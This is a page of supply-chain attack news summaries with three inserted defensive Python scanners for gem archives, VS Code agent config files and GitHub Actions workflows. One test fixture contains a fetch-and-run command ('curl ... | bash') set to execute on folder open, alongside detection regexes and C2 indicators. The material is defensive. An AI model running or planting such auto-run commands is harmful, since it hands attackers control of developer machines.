< ciso brief />

All news with #supply chain compromise tag

525 articles · page 3 of 27

Threatsday Bulletin: PAN-OS RCE, AI Risks, Supply-Chain

🔥 Palo Alto released fixes for CVE-2026-0300, a critical PAN-OS buffer-overflow exploited in the wild to drop payloads like EarthWorm and ReverseSocks5. The bulletin also highlights new and recurring threats including zero-auth API data leaks at an AI training vendor, an FCC extension for router updates, supply-chain contests, and sophisticated phishing campaigns. Several incidents employ weaponized attachments, tokenizer tampering in AI models, and open-source tools to achieve stealthy remote access and long-term persistence.

Foxconn Confirms Cyberattack at North American Sites

🔒 Foxconn confirmed a cyberattack affected some of its North American factories and says impacted sites are resuming normal production. The company said its cybersecurity team activated response measures to maintain continuity of operations and deliveries. Nitrogen ransomware operators claimed 8 TB of data and over 11 million documents were stolen, allegedly including files from Apple, Nvidia, Intel and Google. Foxconn has faced prior ransomware incidents.

GemStuffer Abuses RubyGems to Store Scraped Council Data

🔍 Security researchers have identified a campaign called GemStuffer that abuses RubyGems as a storage channel for scraped content rather than as a vehicle for mass malware distribution. More than 150 gems were observed packaging HTTP responses from U.K. local government ModernGov portals into valid .gem archives and publishing them using hardcoded API keys. Variants either build and push gems via the CLI (creating temporary credentials under /tmp and overriding HOME) or upload archives directly to the registry API, after which attackers can retrieve the content with a simple gem fetch.
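The GemStuffer technique is about what a gem carries, not what it executes, so the practical check is to open the archive and look at the packaged files before trusting the name on the registry. The scanner below is an added example, not the researchers' or RubyGems' own tooling: it relies on the real .gem layout (an outer tar holding metadata.gz and data.tar.gz), builds two constructed gems in memory so it runs offline, and flags packaged files that are HTTP responses or HTML documents rather than Ruby source. The sample file contents and the heuristics are assumptions; run `scan_gem(open(path, "rb").read())` on anything you pull with `gem fetch`.

```python
import gzip
import io
import tarfile


def _add(tar, name, data):
    """Append an in-memory file to an open tarfile."""
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))


def build_gem(files):
    """Build a minimal .gem-shaped archive in memory: an outer tar holding
    metadata.gz and data.tar.gz. Constructed for this example only."""
    data_buf = io.BytesIO()
    with tarfile.open(fileobj=data_buf, mode="w") as inner:
        for name, content in files.items():
            _add(inner, name, content)
    spec = b"--- !ruby/object:Gem::Specification\nname: example\nversion: 0.0.1\n"
    outer_buf = io.BytesIO()
    with tarfile.open(fileobj=outer_buf, mode="w") as outer:
        _add(outer, "metadata.gz", gzip.compress(spec))
        _add(outer, "data.tar.gz", gzip.compress(data_buf.getvalue()))
    return outer_buf.getvalue()


# Crude "is this Ruby at all" markers; a real scanner would parse the source.
RUBY_MARKERS = (b"def ", b"class ", b"module ", b"require", b"end")


def classify(name, content):
    """Reason string if a packaged file looks like stored web content, else None."""
    head = content.lstrip()[:32].lower()
    if head.startswith((b"http/1.", b"http/2", b"<!doctype", b"<html")):
        return "stored HTTP response or HTML document"
    if name.endswith(".rb") and not any(m in content for m in RUBY_MARKERS):
        return "Ruby source file containing no Ruby code"
    return None


def scan_gem(gem_bytes):
    """Walk data.tar.gz inside a .gem and return [(path, reason)] for suspicious files."""
    with tarfile.open(fileobj=io.BytesIO(gem_bytes), mode="r:") as outer:
        data_tgz = outer.extractfile("data.tar.gz").read()
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data_tgz), mode="r:gz") as inner:
        for member in inner.getmembers():
            if not member.isfile():
                continue
            reason = classify(member.name, inner.extractfile(member).read())
            if reason:
                findings.append((member.name, reason))
    return findings


# Constructed sample inputs (not real gems from the campaign).
CLEAN_FILES = {
    "lib/example.rb": b"module Example\n  def self.hi\n    'hi'\n  end\nend\n",
}
STUFFED_FILES = {
    "lib/example.rb": CLEAN_FILES["lib/example.rb"],
    "data/page_001.html": (
        b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
        b"<!DOCTYPE html><html><head><title>Council meetings</title></head>"
        b"<body><table><tr><td>Committee</td></tr></table></body></html>"
    ),
    "lib/page_002.rb": b"<html><body>more scraped content</body></html>",
}

if __name__ == "__main__":
    print(scan_gem(build_gem(CLEAN_FILES)))    # no findings
    print(scan_gem(build_gem(STUFFED_FILES)))  # both stored pages flagged
```

The metadata.gz specification is deliberately not consulted: the campaign's gems are valid archives with plausible specs, so the only reliable signal is the payload itself.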

Mass npm and PyPI Supply-Chain Compromise Targets TanStack

🛡️ The TeamPCP group compromised 170 npm and PyPI packages on May 11, rapidly spreading malicious code across ecosystems including the @tanstack router and Mistral AI SDKs. Attackers abused GitHub Actions' pull_request_target trigger to harvest OIDC tokens and inject the Mini Shai-Hulud malware, which steals credentials and carries a destructive dead-man’s switch. Security vendors detected the compromise quickly; affected users should check lockfiles, pin known-good versions, and rotate exposed credentials.

AI Coding Agents Expand Developer Threat Surface Risks

🔍 AI coding agents now operate across IDEs, terminals, and extension runtimes, so defenders must expand focus beyond source code to repository files, instruction and runtime settings, and third‑party extensions that shape agent behavior. VirusTotal Code Insight and agentic threat intelligence apply semantic analysis to detect malicious intent in syntactically valid artifacts and link findings to broader campaigns and supply‑chain risks. Examples—weaponized tasks.json, malicious Skill.md, redirected settings.json endpoints, and sabotaged extensions—illustrate how semantics can enable exfiltration, privilege escalation, and stealthy attacker control.
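The point of the item above is that agent-shaping files are syntactically ordinary and only their meaning is hostile, so repository hygiene checks have to read them rather than just list them. The following is an added example, not VirusTotal's Code Insight or any vendor's product: a Python scan over a constructed VS Code tasks.json and settings.json that flags a task set to start on folder open and/or to pipe downloaded content into a shell, and any URL-valued setting whose host is not on the team's expected list. The setting keys (`assistant.apiBase`, `assistant.telemetryUrl`) and the hostnames are invented placeholders; `runOptions.runOn: folderOpen` is VS Code's real auto-run option.

```python
import json
import re
from urllib.parse import urlparse


def _load_jsonc(text):
    """VS Code config files allow // comments (JSONC); drop whole-line comments, then parse."""
    return json.loads(re.sub(r"^\s*//.*$", "", text, flags=re.M))


# "download something and hand it straight to an interpreter" inside a task command line
FETCH_AND_RUN = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr)\b.*\|\s*(sh|bash|zsh|pwsh|powershell|iex)\b"
    r"|\bbase64\s+(-d|--decode)\b", re.I)


def scan_tasks(text):
    """Return (label, auto_runs_on_open, fetches_and_executes) for tasks worth a human look."""
    findings = []
    for task in _load_jsonc(text).get("tasks", []):
        label = task.get("label", "<unlabeled>")
        auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
        cmdline = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        fetch = bool(FETCH_AND_RUN.search(cmdline))
        if auto or fetch:
            findings.append((label, auto, fetch))
    return findings


def scan_settings(text, expected_hosts):
    """Return (setting path, host) for every URL-valued setting pointing at an unexpected host."""
    findings = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, val in node.items():
                walk(val, f"{path}.{key}" if path else key)
        elif isinstance(node, list):
            for i, val in enumerate(node):
                walk(val, f"{path}[{i}]")
        elif isinstance(node, str) and node.startswith(("http://", "https://")):
            host = urlparse(node).hostname or ""
            if host not in expected_hosts:
                findings.append((path, host))

    walk(_load_jsonc(text), "")
    return findings


# Constructed samples; keys and hosts are illustrative, not from a real incident.
TASKS_JSON = """\
{
  // starts the moment the folder is opened, before anyone reads the task
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://updates.example.test/setup.sh | bash",
      "runOptions": { "runOn": "folderOpen" }
    },
    { "label": "lint", "type": "shell", "command": "npm run lint" }
  ]
}
"""

SETTINGS_JSON = """\
{
  "editor.formatOnSave": true,
  "assistant.apiBase": "https://api.assistant.example.test/v1",
  "assistant.telemetryUrl": "https://telemetry.example-attacker.test/collect"
}
"""

if __name__ == "__main__":
    print(scan_tasks(TASKS_JSON))
    print(scan_settings(SETTINGS_JSON, {"api.assistant.example.test"}))
```

The allowlist approach is deliberate: an extension's legitimate endpoint and an attacker's redirect look identical as JSON, so the only defensible rule is "URLs in agent configuration may point only at hosts we have agreed to", enforced in CI on every change to the .vscode directory.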

RubyGems Pauses New Signups After Major Malicious Attack

🔒 RubyGems has temporarily disabled new account registrations after a coordinated malicious campaign targeted the registry, forcing maintainers to pause signups while they investigate. Mend.io and RubyGems report hundreds of affected packages; some contained exploits and junk spam. The maintainers are removing malicious gems, blocking bot accounts, and coordinating with Fastly to enable a WAF and tighter rate limits before reopening signups.

TanStack npm Compromise in Mini Shai‑Hulud Supply Attack

⚠️ Socket reports a wave of the Mini Shai‑Hulud campaign modified 84 npm artifacts in the @tanstack namespace on 11 May 2026, inserting a heavily obfuscated credential‑stealing payload. Attackers abused GitHub Actions via the pull_request_target pattern, cache poisoning and runtime OIDC token extraction to hijack release pipelines. Affected packages included high‑download modules like @tanstack/react-router, and the GitHub Advisory Database rated the incident critical.

Mini Shai-Hulud Worm Compromises npm and PyPI Supply Chain

⚠ TeamPCP's "Mini Shai-Hulud" campaign has trojanized npm and PyPI packages from maintainers including TanStack, Mistral AI, OpenSearch, UiPath, and Guardrails AI, deploying an obfuscated credential stealer that targets cloud services, crypto wallets, AI tools, messaging apps and CI systems. The malware exfiltrates data via a Session Protocol domain (filev2.getsession[.]org), a typosquat domain and GitHub API dead-drops, and persists through IDE hooks in Claude Code and VS Code. Attackers abused GitHub Actions OIDC permissions and produced malicious packages with valid SLSA attestations; TanStack's cluster was assigned CVE-2026-45321 (CVSS 9.6).
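The pull_request_target abuse that runs through the three Mini Shai-Hulud items above (and the earlier npm/PyPI item) reduces to one workflow shape: a job triggered by pull_request_target, which runs with the base repository's secrets, that then checks out the pull request's head commit and executes it, with id-token: write letting that code mint an OIDC token. The lint below is an added example, not code from Socket, TanStack or the advisories: it runs over three constructed workflow texts and reports only the dangerous combination. It uses regexes instead of a YAML parser so it runs offline with the standard library; a production check should parse the YAML and walk each job's steps.

```python
import re

# Trigger in block form ("on:\n  pull_request_target:") or flow-list form ("on: [push, pull_request_target]")
PRT_BLOCK = re.compile(r"^\s*pull_request_target\s*:", re.M)
PRT_LIST = re.compile(r"^on:\s*\[([^\]]*)\]", re.M)
# actions/checkout pointed at the PR head: contributor-controlled code enters the job
HEAD_REF = re.compile(
    r"ref:\s*\$\{\{\s*github\.(?:event\.pull_request\.head\.(?:sha|ref)|head_ref)\s*\}\}")
ID_TOKEN_WRITE = re.compile(r"^\s*id-token:\s*write\b", re.M)


def uses_pull_request_target(text):
    """True if the workflow is triggered by pull_request_target in either YAML form."""
    if PRT_BLOCK.search(text):
        return True
    m = PRT_LIST.search(text)
    return bool(m and "pull_request_target" in m.group(1))


def lint_workflow(text):
    """Return human-readable findings for the secrets/OIDC exposure pattern.

    Only the combination matters: pull_request_target alone is a legitimate
    trigger (it is how bots label or comment on forks' PRs), and checking out
    the PR head is harmless under plain pull_request, which gets no secrets.
    """
    findings = []
    if not uses_pull_request_target(text):
        return findings
    if HEAD_REF.search(text):
        findings.append(
            "pull_request_target job checks out the PR head: contributor code runs "
            "with the base repository's secrets and GITHUB_TOKEN")
        if ID_TOKEN_WRITE.search(text):
            findings.append(
                "id-token: write is also granted: that code can mint an OIDC token "
                "and use it against any cloud role or registry that trusts this repo")
    return findings


# Constructed sample workflows (not taken from any real repository).
VULNERABLE = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
permissions:
  contents: read
  id-token: write
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
"""

# Same job under the plain pull_request trigger: no secrets, no OIDC, so the head checkout is fine.
SAFE = VULNERABLE.replace("pull_request_target:", "pull_request:")

# pull_request_target that never checks out the PR head (a labeler): the id-token
# grant is still worth trimming, but no contributor code runs in the job.
LABELER = """\
name: label
on: [pull_request_target]
permissions:
  id-token: write
  pull-requests: write
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/labeler@v5
"""

if __name__ == "__main__":
    for name, wf in (("VULNERABLE", VULNERABLE), ("SAFE", SAFE), ("LABELER", LABELER)):
        print(name, lint_workflow(wf) or "no findings")
```

The fix the lint implies is the usual one: keep pull_request_target jobs to actions that never execute PR content, move tests and package installs to a pull_request workflow, and grant id-token: write only to the release job that actually publishes, on a trigger a fork cannot reach.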

cPanel Vulnerability Exposes Hosting Supply Chain Risks

🔒 A recently disclosed cPanel vulnerability, tracked as CVE-2026-41940, is being exploited at scale to deploy backdoors, plant SSH keys, steal credentials, and compromise hosting systems. Researchers at XLab link much of the activity to a long-running group called Mr_Rot13, with automated scans from over 2,000 attacker IPs observed after the late-April disclosure. The incident highlights weak visibility into hosting control planes and urges organizations to treat exposed control panels as high-priority incidents: patch immediately, rotate credentials, hunt for webshells, and review logs for persistence.

Developer Workstations: The New High‑Value Beachhead

🔐 Three separate April reports describe unrelated threat actors independently targeting developer machines as the preferred initial-access vector. The incidents include a North Korean campaign that trojanized packages across five ecosystems, a Zig-compiled native binary that infects IDEs, and a cascading compromise chaining developer tools into credential theft. Together they illustrate how developer workstations function as credential stores, pipeline controllers and trust anchors, and why traditional endpoint controls are insufficient. Organizations must improve visibility, isolate build environments, enforce stricter controls on IDE extensions and package installs, and assign clear ownership for this distinct attack surface.

Malicious Infostealer Found in Top Hugging Face Repo

🔒 HiddenLayer discovered the Open-OSS/privacy-filter repository on Hugging Face was malicious on May 7. The repo, which copied OpenAI's Privacy Filter model card almost verbatim and showed inflated engagement, delivered a Rust-based infostealer via a base64-encoded loader. The malware steals browser passwords, session cookies, tokens, crypto wallet data and other credentials. HiddenLayer warns anyone who ran files from the repo to treat hosts as fully compromised and to wipe, isolate and rotate all affected credentials.

Checkmarx Jenkins Plugin Compromised in Supply-Chain Attack

🔒 Checkmarx warned that a rogue version of its Jenkins AST plugin was published to the Jenkins Marketplace and contained credential-stealing malware attributed to the TeamPCP threat group. The attackers used credentials obtained in a prior Trivy supply-chain breach to backdoor multiple developer tools and maintain access. Checkmarx is publishing a clean plugin release, advising users to revert to version 2.0.13-829.vc72453fa_1c16, rotate secrets, and investigate for compromise.

TeamPCP Publishes Malicious Checkmarx Jenkins Plugin

🔒 Checkmarx confirmed a modified Jenkins AST plugin was published to the Jenkins Marketplace after attackers used stolen credentials to push malicious code. The company released v2.0.13-848.v76e89de8a_053 on GitHub and the Marketplace and says this release addresses the incident. It advised users to ensure they run 2.0.13-829.vc72453fa_1c16 (published Dec 17, 2025) or later. Researchers attribute the activity to TeamPCP.

Weekly Recap: Linux Rootkits, Supply Chain and Cloud Breaches

⚡ This weekly recap highlights a string of active campaigns and exploited flaws affecting enterprise and cloud environments. Attackers weaponized vulnerabilities in Ivanti EPMM and Palo Alto PAN-OS, while a new modular Linux implant dubbed Quasar Linux (QLNX) pairs a kernel rootkit with a P2P mesh to resist takedowns. Several supply-chain compromises and credential-stealing campaigns are targeting cloud and developer tooling, and threat actors increasingly abuse legitimate RMM platforms for persistence.

Fake Hugging Face Model Impersonating OpenAI Hits 244K

⚠️ A malicious Hugging Face repository posing as an OpenAI release delivered an infostealer to Windows hosts and accumulated about 244,000 downloads before removal. Researchers at HiddenLayer found the repo copied OpenAI’s model card and included a loader.py that fetched and executed credential-stealing payloads. The loader disabled SSL verification, used jsonkeeper.com as a C2, and employed scheduled tasks and a Rust-based infostealer to exfiltrate browser data, wallets, Discord storage, and FileZilla credentials.

JDownloader Site Compromise Replaced Installers with RAT

⚠ The official JDownloader website was compromised between May 6 and May 7, 2026, and attackers replaced alternative Windows and Linux installers with malicious payloads. The Windows binaries deploy a heavily obfuscated Python-based remote access trojan, while the Linux shell installer installs SUID-root components and persistence. Developers say the CMS was abused to alter download links without host-level access and have taken the site offline to investigate. Users who ran affected installers should treat systems as compromised, verify installers' digital signatures (AppWork GmbH) and consider reinstalling and rotating credentials.

RansomHouse Claims Breach of Trellix Source Code Repository

🔒 RansomHouse has claimed responsibility for last week's intrusion into Trellix's source code repository, publishing a small set of images as proof of access to the vendor's appliance management system. Trellix confirmed unauthorized access on May 1 and said it immediately engaged leading forensic experts and notified law enforcement. The company reported no evidence so far that its source code release or distribution process was affected and continues to investigate.

Fake Claude-Pro Site Distributes Beagle Windows Backdoor

⚠️ A fake Claude website pushed a 505MB archive named 'Claude-Pro-windows-x64.zip' that installs a trojanized MSI and drops three Startup files: NOVupdate.exe, NOVupdate.exe.dat, and avk.dll. Sophos and Malwarebytes analysis shows the signed G Data updater is abused to sideload avk.dll and an encrypted payload, which decrypts an in-memory DonutLoader that deploys the new Beagle backdoor. Beagle runs in memory, communicates with C2 at license.claude-pro[.]com (8.217.190[.]58) over TCP/443 or UDP/8080 using a hardcoded AES key, and supports basic file and command operations.

Daemon Tools Confirms Malware-Backdoored Installer

🛡️ Disc Soft has confirmed that certain Daemon Tools Lite installers were Trojanized and released in a compromised build (version 12.5.1) after unauthorized interference in its build environment. The company released a malware-free update, Version 12.6, within 12 hours of notification and says the incident is contained. Users who installed the impacted release are advised to uninstall the application, run a full system scan with trusted security software, and reinstall only the verified package from the official site.

DAEMON Tools supply-chain breach; malware-free update

🔒 Disc Soft confirmed a supply-chain compromise that trojanized installers for DAEMON Tools Lite and has released a clean build. The company says it secured its infrastructure and published version 12.6 (May 5) which no longer exhibits malicious behavior. Users who installed the free 12.5.1 build since April 8 should uninstall, run a full antivirus scan, and reinstall the latest release. Kaspersky found backdoors and a two-stage payload deployed to thousands of systems across 100+ countries.